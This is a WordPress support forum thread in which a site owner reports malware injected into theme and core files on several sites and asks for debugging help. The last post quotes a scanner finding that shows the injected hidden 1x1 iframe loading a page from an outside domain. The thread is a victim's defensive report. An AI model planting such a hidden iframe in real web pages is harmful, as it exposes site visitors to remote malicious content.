WP Malware Problems! (5 posts)

  1. ImpactMedia
    Posted 3 years ago #

    Finding that malware iframes is being installed in several JS files as well as some WP files such as wp-login.php, wp-login.php?action=register

    The malware is also preventing all WordPress auto updates including core package updates, theme installation, and plugin updates from version 3.3.1. (meaning can't auto update from 3.3.1 to 3.3.2)

    I'm noticing this happening across several WordPress sites that i'm running. They're also installing it through several theme JS files as well...and doesn't seem to be specific to a particular theme. I'm guessing once they're in they're able to modify whatever files share the same access level.

    I should add i'm using: http://sitecheck.sucuri.net/scanner/ to check for the Malware.

  2. Tara
    Volunteer Moderator
    Posted 3 years ago #

  3. ImpactMedia
    Posted 3 years ago #

    I came across this recent posting and it appears this is a widespread and growing epidemic.


  4. kmessinger
    Forum Moderator
    Posted 3 years ago #

  5. ImpactMedia
    Posted 3 years ago #

    In almost all of the effected JS files at the end of the page i found this code.

    [Code moderated. Please do not post hack code blocks in the forums. Please use the pastebin]

    Securi Scanner found:

    Hidden Iframes.
    Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202
    <iframe src="http://www.sebestia.in/images.php?t=44443094" width="1" height="1">

    But it reports it in a post or in a category...how can i debug a post or category?

Topic Closed

This topic has been closed to new replies.

About this Topic